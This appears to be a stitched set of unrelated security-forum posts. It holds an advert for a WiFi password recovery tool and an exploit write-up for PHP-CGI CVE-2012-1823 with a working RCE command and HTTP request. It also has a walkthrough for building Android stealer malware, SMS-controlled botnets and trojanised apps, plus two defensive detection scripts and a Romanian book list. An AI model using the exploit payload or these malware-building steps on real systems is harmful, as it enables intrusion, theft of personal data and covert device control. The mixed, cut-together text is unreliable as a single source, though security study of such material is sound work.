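    rows = db.execute(
        "SELECT filename FROM attachment WHERE posthash = ?", (posthash,)
    )
    return [row[0] for row in rows]
```

With bound parameters a value containing quotes is stored as data and never reaches the SQL parser as syntax, which matters for stored values such as posthash that are read back into a later query.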
-
WiFi Password Decryptor
WiFi Password Decryptor is the FREE software to instantly recover Wireless account passwords stored on your system.

It automatically recovers all types of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager. For each recovered WiFi account, it displays the following information:
- WiFi Name (SSID)
- Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP)
- Password Type
- Password in clear text

After the successful recovery you can save the password list to HTML/XML/TEXT file. You can also right click on any of the displayed accounts and quickly copy the password. Under the hood, 'WiFi Password Decryptor' uses System Service method (instead of injecting into LSASS.exe) to decrypt the WiFi passwords. This makes it safer and more reliable. It also allows us to have just a single EXE that works on both 32-bit & 64-bit platforms. New version 1.5 supports a command-line version, making it useful for automation & penetration testers. It has been successfully tested on Windows Vista and higher operating systems including Windows 8.

Features & Benefits
- Instantly decrypt and recover stored WiFi account passwords
- Recovers all types of Wireless Keys/Passwords (WEP/WPA/WPA2 etc)
- Command-line version for automation & penetration testers.
- Simple & elegant GUI interface makes it easy to use.
- Right click context menu to quickly copy the Password
- Sort feature to arrange the displayed passwords
- Save the recovered WiFi password list to HTML/XML/TEXT file.
- Integrated Installer for assisting you in local Installation & Uninstallation.

Details: http://securityxploded.com/wifi-password-decryptor.php
Download: http://securityxploded.com/download.php#wifipassworddecryptor
-
[h=1]Exploit Development: PHP-CGI Remote Code Execution – CVE-2012-1823[/h]by infodox
The CVE-2012-1823 PHP-CGI exploit was, quite possibly, one of the most groundbreaking exploits of 2012. In a year that brought us MS-12-020 (the most hyped bug in my recollection), multiple Java 0day exploits, and several MySQL exploits, the PHP-CGI bug still stands out as one of the most hilariously brilliant bugs to show up for several reasons. Primarily the massive misunderstanding of how it worked.

For this exploit to work, PHP had to be running in CGI mode. A fairly obscure configuration not seen all too often in the wild. Essentially, with this vulnerability, you could inject arguments into the PHP-CGI binary and make changes to php.ini directives, allowing for remote code execution.

Developing an exploit for this bug is trivial. In order to gain remote code execution, you tell PHP.ini that it is to allow URL inclusion ( allow_url_include = 1 ), and to automatically prepend the “file” php://input. This means whatever we send in the POST request is parsed as PHP, and executed.

One way to exploit this (targeting example.com), using the lwp-request’s “POST” utility, is as follows.

echo "<?php system('id');die(); ?>" | POST "http://example.com/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"

As you will see in the video, we can easily use this to execute commands remotely from a BASH shell. The HTTP request sent looks something similar to this:

POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: example.com
User-Agent: lwp-request/6.03 libwww-perl/6.04
Content-Length: 29
Content-Type: application/x-www-form-urlencoded

<?php system('id');die(); ?>

The response to that was the server sending back the result of our command (id), so we know it works.
So now we have a somewhat reliable “commandline” RCE method, however, we like to automate things… Let’s see how hard it is to write a reliable exploit in Python. The following screenshot shows exploitation using Python.

Exploiting PHP-CGI bug with Python

So, we know now that using Python’s requests library (a mainstay of all my exploits, as I guess you noticed). Now that we have reliable exploitation using Python, I decided to go a step further and write an actual exploit in Python to automate the whole thing. It simply drops you into a shell of sorts, giving you the ability to run commands as the web-user.

Exploit code available here: Google Code – Insecurety Research

So, along comes the demo, as usual in video format. This time, with additional tunes by Blackmail House, who gave me permission to use their music in demo videos the other day in the pub. Remember, play nice out there.

Source: Exploit Development: PHP-CGI Remote Code Execution – CVE-2012-1823 | Insecurety Research
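The request shown in the post has a recognisable shape in web server logs: a query string with no literal "=" (it is sent as %3d) whose first argument starts with a dash. The following detection sketch is an added example, not code from the post or from Insecurety Research; the log lines are constructed, the function names are assumptions, and the rule is a heuristic that only matters on hosts where PHP runs in CGI mode.

```python
import re
from urllib.parse import unquote

# Common/combined log format: client, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [06/Jan/2013:10:00:01 +0000] "GET /index.php?id=7&sort=-date HTTP/1.1" 200 5120
198.51.100.7 - - [06/Jan/2013:10:00:04 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 312
192.0.2.44 - - [06/Jan/2013:10:00:12 +0000] "GET /search.php?php+cgi+tutorial HTTP/1.1" 200 900
203.0.113.5 - - [06/Jan/2013:10:00:15 +0000] "GET /a.php?%2Dd+display_errors%3D1 HTTP/1.1" 404 0
"""


def injected_directives(target):
    """Return the -d ini overrides carried by a request target, or None when
    the query string does not have the argument-injection shape."""
    query = target.partition("?")[2]
    # A literal '=' means ordinary name=value parameters, not arguments.
    if not query or "=" in query:
        return None
    # Arguments are '+'-separated; decode first so an encoded dash is not missed.
    args = [unquote(a) for a in query.split("+")]
    if not args[0].lstrip().startswith("-"):
        return None
    found = []
    for i, arg in enumerate(args):
        arg = arg.strip()
        if arg == "-d" and i + 1 < len(args):
            found.append(args[i + 1])      # "-d name=value" as two arguments
        elif arg.startswith("-d") and len(arg) > 2:
            found.append(arg[2:])          # "-dname=value" as one argument
    return found


def scan(log_text):
    """Return one record per log line whose query string looks like options."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        directives = injected_directives(target)
        if directives is not None:
            hits.append({"client": client, "method": method,
                         "status": int(status), "directives": directives})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 on a CGI-mode host deserves priority, and the listed directives show which php.ini settings the request tried to override.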
-
Hack Android With Android Exploitation Framework

IMPORTANT NOTE: The below information is for educational and research purposes only and to illustrate how insecure the Android platform is. You will also come to see how most of the present Android anti-malwares fail to detect threats in the current scenario. Also, infecting another person's computer/mobile devices with a malicious application without his permission is a punishable crime.

There exist a lot of tools to exploit the security holes in a normal PC environment, but there have been really few tools for the Android environment which are at the same time expandable. By expandable, I’m trying to say that the users who use the framework could build their own modules and share them with the security community.

Android Framework for Exploitation is an open-source project which we have developed in order to increase mobile security research, check for application based and platform based vulnerabilities, as well as write plugins for the framework and share them with the community.

Subho Halder and me (Aditya Gupta) have developed a framework known as Android Framework for Exploitation, which we released at BlackHat Abu Dhabi in December 2012. The aim of this framework is to help the mobile security community to analyze applications, exploit vulnerabilities, build POCs, and share their own modules with other users.

One of the interesting features of this framework is the ability to build malwares, botnets and even inject malwares into existing legitimate applications. This is just to show how ineffective our current mobile anti malwares are against these types of infected versions of legitimate applications, as at the time of writing, none of the anti malwares for Android detected the malware sample.

Some of the features which we’ll be looking into in this post are:
1. Creating a malware
2. Creating a botnet
3. Injecting malicious codes in a legitimate application
4. Analyzing vulnerable applications

Before we go further, let us have a look at the file structure of AFE. Once you download AFE, you will have a structure similar to the one given below. The Input folder will contain all the input apk(s) for any processing, such as crypting the apk to make it undetectable by anti malwares, or inserting the apk into any other legitimate apk, and so on.

Creating a malware

AFE allows users to create malwares for their devices with prebuilt templates. You could also modify the source code of the malware, and modify the GUI of the application apk as you want. To create a malware, first of all you have to launch AFE by typing in ./afe. To get help at any point of time, just type in ? and hit enter.

Note: This tool is made natively for *nix based systems. If you’re running Windows, you could use it by installing Cygwin. Also make sure you have all the dependencies such as Python and the Android SDK installed.

Once you are inside the menu, type in run [the module name] to execute a particular module. In this case, the module is named malware. Once you type in run malware, just type in your local IP address in the Set Reverse IP option. Once you set your reverse IP (same as LHOST), you’ll have the option of Stealer. There are 3 predefined stealers, and you can add more yourself. The 3 already existing ones include:
• Call Logs
• Contacts
• Messages

Here’s a video of it.

Creating a Botnet

To create a botnet, you have to launch AFE as mentioned earlier, and go on to create a botnet, similar to what we did in the last demo. Once you’ve created and installed the botnet on any Android based smartphone, you could control it by sending SMS from any phone to the infected phone, and getting the response back using SMS itself. Also, this whole process will go on in the background, so the user won’t be able to know if any kind of malicious activity is being performed.
Some of the SMS based commands are:
- toast: To display a particular message on the screen
- infect: To spread the botnet to any other device by sending an SMS from an already infected device
- browse: Automatically open a URL on the victim’s phone
- shell: The most useful command. Could be used to execute any shell based commands. For example, xysec shell cat /proc/version

Note: All the commands should be prefixed with the keyword ‘xysec’ - this could be changed by modifying the source of the botnet. This is to make sure the SMS which has been sent as a command won’t be displayed in the notifications of the victim.

Analyzing Application for Leaking Content Providers

One of the most important components of Android applications while working with application data is Content Providers. To get the content providers of the application, you could either reverse the application manually and look for the content providers, or you could use a tool such as Apktool and parse information based on the filter of content://

To find content providers with the help of AFE, you need to place the application you want to analyse in the Input folder. Once we select the application, it will automatically present us with the list of content providers present in the application. After finding out the permission of the content providers, if one is set as exported without any permission checking, the application is vulnerable to the leaking content providers vulnerability.

To make a POC of this vulnerability, we could use the content provider (the vulnerable one) and make another application parsing this content provider. Following is a sample code snippet we made: We are accessing the vulnerable application’s data using its content provider. Uri.parse(">

We will further update the Github repo located at https://github.com/xysec/AFE/ to make POCs automatically.

Injecting malicious codes in legitimate application

Using AFE, you could inject malicious codes into legitimate applications.
This is to demonstrate how easy it is for malware authors to create infected versions of legitimate applications, and how anti-malwares should improve their detection strategy to distinguish between fake and legitimate applications. To create the application:
- Select the malware to be injected
- Choose the target apk
- Type inject

Once we select our target application, it will inject all the services and permissions from our malware (which we have already created) and even sign the newly created application with our key. The newly created file will be stored in /Output under the names [originalapp].apk and [originalapp]_signed.apk.

Creating Plugins for AFE

AFE is an extendable framework, which could be integrated with user made plugins. To create a plugin, you need to go to the modules directory and create a directory with the name of your plugin. Let us take an example of a plugin named DB Stealer. This plugin grabs all the database files (.db) from the device or emulator, and saves them on the system. The code for this plugin has been written in PHP. There are 3 necessary files:
- Run.sh
- dbstealer.php
- dbstealer.info

Run.sh is the initializing code, which will load up the entire code (written in any language, in this case PHP), and will execute it. The second file, dbstealer.php, is the main code of the plugin. It is loaded from run.sh with the code php dbstealer.php. The third file, dbstealer.info, will contain the information about the plugin, which will be displayed when the user types in info dbstealer from the afe prompt.

Hope you guys enjoyed the post. Feel free to mail us at security@xysec.com for any bug issues/suggestions/trainings/ideas!

Source: Hack Android With Android Exploitation Framework | Learn How To Hack - Ethical Hacking and security tips
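The content provider section of the post says an application leaks data when a provider is exported without any permission check. The following manifest audit is an added example, not part of AFE or of the post: it reads a decoded AndroidManifest.xml (as a tool such as Apktool produces) and lists exported providers whose read or write access has no permission. The sample manifest is constructed, the function name is an assumption, and the export default is simplified to "exported unless targetSdkVersion is 17 or higher"; path-permission, grantUriPermissions and the permission's protection level are not examined.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifest (hypothetical package and provider names).
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="16"/>
  <application>
    <provider android:name=".NotesProvider"
              android:authorities="com.example.notes.provider"/>
    <provider android:name=".SettingsProvider"
              android:authorities="com.example.notes.settings"
              android:exported="false"/>
    <provider android:name=".SyncProvider"
              android:authorities="com.example.notes.sync"
              android:exported="true"
              android:readPermission="com.example.notes.READ"/>
    <provider android:name=".BackupProvider"
              android:authorities="com.example.notes.backup"
              android:exported="true"
              android:permission="com.example.notes.ACCESS"/>
  </application>
</manifest>
"""


def audit_providers(manifest_xml):
    """Return exported providers that leave read and/or write unprotected."""
    root = ET.fromstring(manifest_xml.strip())
    sdk = root.find("uses-sdk")
    target = 1
    if sdk is not None:
        target = int(sdk.get(ANDROID + "targetSdkVersion")
                     or sdk.get(ANDROID + "minSdkVersion") or 1)
    # Simplification: providers are exported by default up to API level 16.
    default_exported = target <= 16

    findings = []
    app = root.find("application")
    if app is None:
        return findings
    app_permission = app.get(ANDROID + "permission")
    for prov in app.findall("provider"):
        exported = prov.get(ANDROID + "exported")
        is_exported = default_exported if exported is None else exported.lower() == "true"
        if not is_exported:
            continue
        # android:permission covers both directions; the read/write
        # attributes override it for their own direction.
        base = prov.get(ANDROID + "permission") or app_permission
        read = prov.get(ANDROID + "readPermission") or base
        write = prov.get(ANDROID + "writePermission") or base
        unprotected = [op for op, perm in (("read", read), ("write", write)) if not perm]
        if unprotected:
            findings.append({
                "name": prov.get(ANDROID + "name"),
                "uri": "content://" + prov.get(ANDROID + "authorities", ""),
                "open": unprotected,
                "implicit_export": exported is None,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_providers(SAMPLE_MANIFEST):
        print(finding)
```

Providers reported with implicit_export are exported only by default, so an explicit android:exported="false" is the usual fix when no other application needs them.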
-
May I recommend something? They are called "books".
- Java de la 0 la expert (Necartonat) - Stefan Tanasa, Cristian Olaru, Stefan Andrei POL978-973-46-2405-8 - eMAG.ro
- Totul despre C si C++ manualul fundamental de programare in C si C++ - Kris Jamsa, Lars Klander TEO973-601-911-X - eMAG.ro
- C++ introducere in standard template library ALL973-571-798-8 - eMAG.ro
- Programare web in Bash si Perl - Sabin Buraga, Victor Tarhon-Onu, Stefan Tanasa POL973-683-931-1 - eMAG.ro
- Sql - Marin Fotache POL973-683-709-2 - eMAG.ro
- Tehnici De Web Design MCO973-000-000-19 - eMAG.ro
- Limbajul C# pentru incepatori - Notiuni de baza - Liviu Negrescu, Lavinia Negrescu ALB973-650-153-1 - eMAG.ro
- Secrete C++ - Constantin Galatan ALB973-650-186-8 - eMAG.ro
And there are a great many of them, very detailed; I guarantee you will understand. It is best to also put into practice what you find in them as you read.